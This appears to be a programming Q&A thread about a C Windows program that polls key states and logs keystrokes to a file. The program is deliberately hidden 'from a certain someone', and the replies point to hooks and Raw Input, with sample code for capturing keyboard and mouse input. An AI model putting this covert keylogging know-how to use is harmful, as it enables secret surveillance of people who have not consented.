# Why does the Sleep() function prevent the entire loop from working?

Tags: c, winapi, sleep

The goal is to create a program that logs keystrokes and writes it into a text file. Currently, just tapping a key will write that key a hundred times so I'm trying to slow it down a bit.

However, using `Sleep()` will prevent this whole code from doing anything at all unless I use `Sleep(0)` (which, as I understand, means "Do not let lower priority threads run").

Code:

```
// Subconsole is Windows so the running app is not visible to a certain someone
int __stdcall WinMain(_In_ HINSTANCE hinstance, _In_opt_ HINSTANCE hprevinstance, _In_ LPSTR lpcmdline, _In_ int ncmdshow)
{   
    FILE* write;
    char running = 1;
    fopen_s(&write, "typelog.txt", "w");

    while (running)
    {
        _Bool keytoggle;
        char key;

        // Go from A to Z and see if the key for that was pressed
        for (int i = 0x41; i < 0x5A; i++)
        {
            // Is the highest order bit for GetAsyncKeyState a 1 (is the key down)
            keytoggle = (GetAsyncKeyState(i) & (1 << 15)) != 0;

            if (keytoggle)
            {
                key = i;    // save the key that was pressed
                break;
            }
        }


        // If the key was pressed, write it, otherwise write a space

        if (keytoggle)
        {
            if (write)
                fprintf(write, "%c", key);
        }

        else
        {
            if (write)
                fprintf(write, " ");
        }


        // Sleep for like, just one millisecond please

        Sleep(1);
    }


    return 0;
}
```

I have heard that using `Sleep`, even for a 1ms, can be extended to 20ms because of the system timer. Is that the case? Even if it was, why would the code not be executed at all?

I've searched for an hour or so and found nothing. If you can help it'd be great.

Comment: for this exist `WH_KEYBOARD_LL`

Comment: `Sleep(0)` means "I'm fine with yielding my time slice and let a context switch to some other process happen". _Why_ are you using Sleep()? If you can't answer that, then _don't_ use Sleep().

Comment: also, sleep uses seconds

Comment: @AsafItach: `Sleep` is not `sleep`.

Comment: Use `MsgWaitForMultipleObjects` to just wait for something reading at the keyboard then use `ReadConsoleInput` to know what happened.

Comment: @Lundin It simply seemed to be the most effective and sensible way to kill time without wasting resources. I have searched for other ways, but I haven't found anything better. Also, does Sleep(1) then mean "I'm fine with yielding my time slice and let a context switch to some other process happen (for one millisecond)"? I still don't understand why the code won't run unless the parameter is 0.

Comment: @AsafItach [this](https://learn.microsoft.com/en-us/windows/win32/api/synchapi/nf-synchapi-sleep) says `dwMilliseconds`

Comment: Of course if you don't mind your program blocking until a key is pressed, use only `ReadConsoleInput` which is much like getch() but returns more detailed information (key up, key down, ctrl, shift, alt, distinct numpad values, function keys,...).

Comment: @Eric Postpischil wow thanks, I knew it was a millisecond but I saw it work by a second - thanks. Mystery solved :)

Comment: *"The goal is to create a program that logs keystrokes"* - Polling the current key state will not provide that information. If you want keystrokes, then ask for keystrokes.

Comment: Blocking may be due to `fprintf`s, try to `fflush` after each `fprintf`. But polling is not the best way to achieve the goal.

Comment: @iinspectable I have not found a function that does that. That's why I'm making my own program to do it.

Comment: You can set up a low-level keyboard hook or use Raw Input to observe keystrokes. Though keystrokes won't help you spy on your girlfriend's facebook account. For that you'll want characters.

Comment: @iinspectable As if I'd have a girlfriend. Thanks though, I got it to work by putting in Sleep delays and opening, writing, and closing between those delays.

Answer (score 0, accepted):

With debugging, the problem is your txt handle is **not** closed when calling `Sleep(1)`. You can use [Message-Only Windows](https://learn.microsoft.com/en-us/windows/win32/winmsg/window-features#message-only-windows) and [Raw Input](https://learn.microsoft.com/en-us/windows/win32/inputdev/raw-input) to achieve your goal. For example:

```
BOOL InitInstance(HINSTANCE hInstance, int nCmdShow)
{
   hInst = hInstance; // Store instance handle in our global variable

   HWND hWnd = CreateWindow(szWindowClass, szTitle, WS_OVERLAPPEDWINDOW,
      CW_USEDEFAULT, 0, CW_USEDEFAULT, 0, HWND_MESSAGE, nullptr, hInstance, nullptr);

   if (!hWnd)
   {
      return FALSE;
   }

   ShowWindow(hWnd, nCmdShow);
   UpdateWindow(hWnd);
   RawInput(hWnd);
   return TRUE;
}
```

and

```
#define BUFFER 512
HRESULT ShowRawInputInfo(LPARAM lParam)
{
    UINT dwSize = 0;
    HRESULT hResult;

    GetRawInputData((HRAWINPUT)lParam, RID_INPUT, NULL, &dwSize, sizeof(RAWINPUTHEADER));
    LPBYTE lpb = new BYTE[dwSize];
    if (lpb == NULL)
    {
        return 0;
    }

    if (GetRawInputData((HRAWINPUT)lParam, RID_INPUT, lpb, &dwSize, sizeof(RAWINPUTHEADER)) != dwSize)
        OutputDebugString(TEXT("GetRawInputData does not return correct size !\n"));

    RAWINPUT* raw = (RAWINPUT*)lpb;
    WCHAR szTempOutput[BUFFER];
    if (raw->header.dwType == RIM_TYPEKEYBOARD)
    {
        hResult = StringCchPrintf(szTempOutput, BUFFER,
            TEXT(" Kbd: make=%04x Flags:%04x Reserved:%04x ExtraInformation:%08x, msg=%04x VK=%04x \n"),
            raw->data.keyboard.MakeCode,
            raw->data.keyboard.Flags,
            raw->data.keyboard.Reserved,
            raw->data.keyboard.ExtraInformation,
            raw->data.keyboard.Message,
            raw->data.keyboard.VKey);
        if (FAILED(hResult))
        {
            // TODO: write error handler
        }
        OutputDebugString(szTempOutput);
    }
    else if (raw->header.dwType == RIM_TYPEMOUSE)
    {
        hResult = StringCchPrintf(szTempOutput, BUFFER,
            TEXT("Mouse: usFlags=%04x ulButtons=%04x usButtonFlags=%04x usButtonData=%04x ulRawButtons=%04x lLastX=%04x lLastY=%04x ulExtraInformation=%04x\r\n"),
            raw->data.mouse.usFlags,
            raw->data.mouse.ulButtons,
            raw->data.mouse.usButtonFlags,
            raw->data.mouse.usButtonData,
            raw->data.mouse.ulRawButtons,
            raw->data.mouse.lLastX,
            raw->data.mouse.lLastY,
            raw->data.mouse.ulExtraInformation);

        if (FAILED(hResult))
        {
            // TODO: write error handler
        }
        OutputDebugString(szTempOutput);
    }

    delete[] lpb;
    return 0;
}
//
//  FUNCTION: WndProc(HWND, UINT, WPARAM, LPARAM)
//
//  PURPOSE: Processes messages for the main window.
//
//  WM_COMMAND  - process the application menu
//  WM_PAINT    - Paint the main window
//  WM_DESTROY  - post a quit message and return
//
//
LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam)
{
    DWORD dwStyleOfStaticText = 0;
    HWND hBmp2 = NULL;
    WORD reason = 0;
    switch (message)
    {
    case WM_INPUT:
    {
        ShowRawInputInfo(lParam);
        break;
    }
    case WM_KEYDOWN:
        WCHAR szTempOutput[512];
            StringCchPrintf(szTempOutput, 512,
                TEXT(" KeyValue=%04x\n"), wParam);
        OutputDebugString(szTempOutput);
        //PostMessage(hWnd, WM_COMMAND, KILLTHEWIN, 0);// hope it serializes message
        //PostQuitMessage(0);
        break;
    case WM_DESTROY:
        PostQuitMessage(0);
        break;
    default:
        return DefWindowProc(hWnd, message, wParam, lParam);
    }
    return 0;
}
```

Edit: Or Hook

Comment: Thanks, I forgot that `Sleep()` would interfere with data already written to the file. Since your solution uses a window (which I've avoided using) and a couple of functions I'm not familiar with, my basic solution for now is to just open and close the file each time I write something to it. Thanks.